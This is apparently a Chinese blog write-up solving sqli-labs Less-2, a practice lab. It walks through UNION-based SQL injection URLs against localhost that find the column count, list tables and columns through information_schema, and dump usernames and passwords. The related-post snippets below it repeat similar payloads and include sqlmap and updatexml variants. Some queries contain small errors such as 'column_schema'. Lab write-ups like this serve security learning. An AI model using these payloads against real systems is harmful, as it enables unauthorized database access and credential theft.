sql-libs less2 详解答案

最新推荐文章于 2022-06-24 17:11:18 发布
最新推荐文章于 2022-06-24 17:11:18 发布
阅读量570 收藏
点赞数
文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45837168/article/details/122540671
版权

首先,判断是哪一种的注入类型——整数型错误
127.0.0.1/Less-2/?id=2
当进行注入的时候,由于在添加单引号的时候整体会发生变化,后部分采用注释将其含义进行消除可以发现对应的sql语句应该是
select * from user where id= 参数
所以可以在其后面进行添加和索引
通过group by 1,2,3的参数可以大致知道对应所有的列数,当自动添加到4时产生错误,所以我们应将 数目得到确定为3
当出现错误时,判断哪个错误地方可以进行注入
127.0.0.1/Less-2/?id=-1 union select 1,2,3
发现注入的地方是2,3
通过注入version():发现注入的数据库是5.0以上版本的
database():对应的数据库是 scerity
2、得到对应数据库的名称后,开始对对应的表和字段名称开始进一步的探究
在MySQL5.0以上的版本,数据库的相关信息存储在一个固定的数据库当中
information_schema 这里面记录着对应数据库和表与相关列的具体信息

从而利用sql的语句进行相关的查找和学习
127.0.0.1/Less-2/?id=-1 union select 1,2,table_name from information_schema.tables where table_schema=‘security’
通过这条语句对应后面进行添加 order by 1 、2、3、4
可以查找到对应的表名
users、email

3、通过得到的数据库进行现有的查询,从而查询对应的列名

127.0.0.1/Less-2/?id=-1 union select 1,2,column_name from information_schema.columns where table_schema=‘security’ and column_schema=‘users’

后面添加order by 来进行整体的添加
127.0.0.1/Less-2/?id=-1 union select 1,2,column_name from information_schema.columns where table_schema=‘security’ and column_schema=‘users’ order by 1、2、3
来找到对应的列表名称

4、最终大致整合出users的表的相关的结构

127.0.0.1/Less-2/?id=-1 union select 1,concat(id,username),password from security.users
或着
127.0.0.1/Less-2/?id=-1 union select 1,2,concat(id,username,password) from security.users
concat默认是只去连接一个,而group_concat() 是将多行连接成一行进行观察

小白巨白
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漫漫SQL lab学习路 less-2篇
netsecure的博客
01-06 310
less 2: 有了less 1 的基础,我们就直接进入正题 输入?id=1’ 报错 输入?id=1 and 1=1正常显示 输入?id=1 and 1=2 报错 说明这是一个整数型的注入漏洞 有了less 1的铺垫我们就不用order by猜列数了 爆表名: 1 and 1=2 union select 1,2,group_concat(table_name) from information_...
sql-libs——less2
bronze_s的博客
10-11 1423
带入执行的SQL语句 $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; 判断列数 http://192.168.0.5:9002/Less-2/?id=1 order by 3 http://192.168.0.5:9002/Less-2/?id=-1 union select 1,2,3 爆表名 http://192.168.0.5:9002/Less-2/?id=-1 union select 1,2,group_concat(table_na
SQL-libs Less-2
AgonYAN的博客
06-24 125
SQL-libs Less-2
LESS2(sql注入)
qq_44598397的博客
03-14 894
Less2 源码 输入:http://127.0.0.1/sqlilabs/Less-2/?id=2’ 输出错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server v ersion for the right syntax to use near ‘’ LIM...
Sqli-labs less 2
weixin_34175509的博客
08-11 113
Less-2 将'(单引号)添加到数字中。 我们又得到了一个Mysql返回的错误,提示我们语法错误。 YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear''LIMIT...
e2fsprogs --> e2fsprogs-libs --> extundelete
02-14
安装顺序:e2fsprogs --> e2fsprogs-libs --> extundelete 逐一编译安装 tar xf e2fsprogs-1.41.14.tar.gz cd e2fsprogs-1.41.14 ./configure make && make install cd tar -xf e2fsprogs-libs-1.41.14.tar.gz cd ...
kmod-libs-20-21.el7.x86_64.rar
05-13
2. **内核稳定性**:由于Oracle数据库对系统稳定性要求很高,kmod-libs确保了内核模块的稳定加载和运行,避免了因模块问题导致的系统崩溃。 3. **安全性**:kmod-libs中的安全特性有助于保护内核模块免受恶意攻击,...
krb5-libs-1.15.1-50.el7.x86_64.rpm
07-06
krb5-libs-1.15.1-50.el7.x86_64.rpm
cocos2d-x-3rd-party-libs-src:cocos2d-x的依存关系
05-28
cocos2d-x第三方库 该存储库包含与cocos2d-x捆绑在一起的第三方库(二进制)的源代码。 对于cocos2d-x开发人员和/或想要: ... $ git clone https://github.com/cocos2d/cocos2d-x-3rd-party-libs-src.
cocos2d-x-3rd-party-libs
01-24
《cocos2d-x与第三方库的IPv6适配及WebSocket技术详解》 在移动游戏开发领域,cocos2d-x是一个广泛使用的2D游戏引擎,它为开发者提供了丰富的功能和高效的性能。随着网络环境的变化,IPv6逐渐成为主流,对于cocos2d...
SQLi-LABS Less-1&&Less-2
m0_64898960的博客
04-09 286
SQLI-LABS
sql注入系列之Sqli-labs(less-2)
BetsyMyGirl的博客
11-30 1433
判断注入点 http://192.168.81.210/sqli/Less-2/?id=1’输入单引号发现出现了sql语句报错,可以知道单引号已经进入到数据库里执行了,语句类似于 select * from users where id =1' limit 0,1 因为正常的情况下,用户只能将搜索的参数传入到数据库里面进行查询,是不可能去修改查询语句的,上方的报错就是由于用户修改了查询的语句而引起的,将以上语句代入到自己的数据库里执行也是会报错的,因为多了一个单引号。 判断注入类型 输入1 and 1=1
sqli-labs靶场第二关
gou1791241251的博客
12-19 746
传入id=1查看页面回显 第一步:判断注入类型。如字符型,数值型 传入单引号和双引号,或不传入参数进行测试。在末尾加入–+进行注入sql语句后面的代码 不传入单引号或双引号页面正常 第二步:判断表字段数 使用order by order by 3 时页面正常 order by 4时页面回显异常,所以有三个字段 第三步:使用联合查询获取数据库相关信息与查看页面回显位置 接下来查看数据库名和版本号 接下来通过mysql数据库中的information_schema数据中的tables表来查询所有
sql注入less2
Mdcq123的博客
10-15 236
http://192.168.197.146/sqli-labs/sqli-labs/Less-2/?id=-1 union selcet 1,database(),3 http://192.168.197.146/sqli-labs/sqli-labs/Less-2/?id=-1 union select 1,(select group_concat(table_name) from infor...
sql-libs less3 答案详解
小白巨白的博客
01-17 551
1、首先对sql的注入语句类型,进行判断,发现当输入数值时,不发生报错,当有单引号时,有错误进行。 sql语句的猜测: select * from 。。 where id=(‘’) 当自己添加‘)进行闭合时,发现整体式子依然成立 说明自己的sql 语句的大致含义正确 2、判断对应的注入点的个数 http://127.0.0.1/Less-3/?id=2’) order by 1、2、3–+ 当出现4的时候,发现错误,所以对应的列数共有3列 3、查找对应的注入点的位置 http://127.0.0.1/Les
Sqli-Labs之less-2
ISNS的博客
02-05 965
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~
SQL练习(less-2)报错注入
AmyBaby00的博客
08-13 450
固定格式: Updatexml(1,concat(0×7e,b) Updatexml(a,Xpath,b) 在文档a中,查找 Xpath 格式的内容 替换 b内容 Conact(a,b,c,…) 用来连接括号内的字符串 构造语句:union select updatexml(1,concat(0x7e,select database(),0x7e),1) http:/...
使用sqlmap对sqli-less-2 的题解
weixin_44352058的博客
05-02 322
1.检测注入点 sqlmap.py -u http://localhost/sqli/Less-2/?id=1 2.查看数据库 sqlmap.py -u http://localhost/sqli/Less-2/?id=1 –dbs 3.查看数据库中的表 sqlmap.py -u http://localhost/sqli/Less-2/?id=1 -D security –tab...
sql-libs(2) 数字型
weixin_30608503的博客
08-09 101
经测试,发现是数字型的注入,直接 and 1=1 返回正常,and1=2返回错误,感觉比第一关更加简单一点啊,,透~ 经测试order by 为 3 。 1. union 注入 http://192.168.48.130/sqli-labs-master/Less-2/?id=-1 union select 1,database(),version() 得到当前数据...
e2fsprogs e2fsprogs-libs安装
最新发布
07-18
e2fsprogs是一个用于管理ext2、ext3和ext4文件系统的工具集,e2fsprogs-libs是e2fsprogs的库文件。 要安装e2fsprogs和e2fsprogs-libs,可以按照以下步骤进行: 1. 打开终端并以管理员身份登录。 2. 检查系统是否...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值